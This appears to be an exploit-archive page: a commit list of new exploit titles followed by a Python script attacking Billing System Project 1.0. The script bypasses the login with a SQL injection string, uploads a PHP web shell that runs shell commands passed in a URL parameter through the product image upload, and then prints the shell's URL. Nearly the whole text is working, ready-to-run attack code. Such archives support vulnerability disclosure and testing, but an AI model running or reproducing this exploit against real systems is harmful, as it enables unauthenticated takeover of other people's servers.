1514ca02a7
13 changes to exploits/shellcodes Huawei dg8045 - Authentication Bypass WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal perfexcrm 1.10 - 'State' Stored Cross-site scripting (XSS) Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated) Netgear DGN2200v1 - Remote Command Execution (RCE) (Unauthenticated) Black Box Kvm Extender 3.4.31307 - Local File Inclusion Pallets Werkzeug 0.15.4 - Path Traversal Billing System Project 1.0 - Remote Code Execution (RCE) (Unauthenticated) Exam Hall Management System 1.0 - Unrestricted File Upload (Unauthenticated) Visual Tools DVR VX16 4.2.28 - Local Privilege Escalation Phone Shop Sales Managements System 1.0 - Authentication Bypass (SQLi) Phone Shop Sales Managements System 1.0 - 'Multiple' Arbitrary File Upload to Remote Code Execution
68 lines
No EOL
2.6 KiB
Python
Executable file
68 lines
No EOL
2.6 KiB
Python
Executable file
# Exploit Title: Billing System Project 1.0 - Remote Code Execution (RCE) (Unauthenticated)
|
|
# Date: 06.07.2021
|
|
# Exploit Author: Talha DEMİRSOY
|
|
# Software Link: https://www.sourcecodester.com/php/14831/billing-system-project-php-source-code-free-download.html
|
|
# Version: V 1.0
|
|
# Tested on: Linux & Windows
|
|
|
|
import requests
|
|
import random
|
|
import string
|
|
from bs4 import BeautifulSoup
|
|
|
|
let = string.ascii_lowercase
|
|
shellname = ''.join(random.choice(let) for i in range(15))
|
|
randstr = ''.join(random.choice(let) for i in range(15))
|
|
|
|
payload= "<?php if(isset($_GET['cmd'])){ echo '<pre>'; $cmd =
|
|
($_GET['cmd']); system($cmd); echo '</pre>'; die; } ?>"
|
|
|
|
url = input("Target : ")
|
|
|
|
session = requests.session()
|
|
|
|
reqUrl = url + "login.php"
|
|
reqHead = {"Content-Type": "application/x-www-form-urlencoded"}
|
|
reqData = {"username": "admin' or '1'='1'#", "password": "-", "login": ''}
|
|
session.post(reqUrl, headers=reqHead, data=reqData)
|
|
|
|
print("Shell Uploading...")
|
|
|
|
reqUrl = url + "php_action/createProduct.php"
|
|
reqHead = {"Content-Type": "multipart/form-data;
|
|
boundary=----WebKitFormBoundaryOGdnGszwuETwo6WB"}
|
|
reqData =
|
|
"\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:
|
|
form-data;
|
|
name=\"currnt_date\"\r\n\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:
|
|
form-data; name=\"productImage\";
|
|
filename=\""+shellname+".php\"\r\nContent-Type:
|
|
application/octet-stream\r\n\r\n"+payload+"\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:
|
|
form-data;
|
|
name=\"productName\"\r\n\r\n"+randstr+"_TalhaDemirsoy\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:
|
|
form-data;
|
|
name=\"quantity\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:
|
|
form-data;
|
|
name=\"rate\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:
|
|
form-data;
|
|
name=\"brandName\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:
|
|
form-data;
|
|
name=\"categoryName\"\r\n\r\n2\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:
|
|
form-data;
|
|
name=\"productStatus\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:
|
|
form-data;
|
|
name=\"create\"\r\n\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB--\r\n"
|
|
session.post(reqUrl, headers=reqHead, data=reqData)
|
|
|
|
print("product name is "+randstr)
|
|
print("shell name is "+shellname)
|
|
|
|
reqUrl = url + "product.php"
|
|
data = session.get(reqUrl)
|
|
|
|
parser = BeautifulSoup(data.text, 'html.parser')
|
|
find_shell = parser.find_all('img')
|
|
|
|
for i in find_shell:
|
|
if shellname in i.get("src"):
|
|
print("Shell URL : " + url + i.get("src") + "?cmd=whoami") |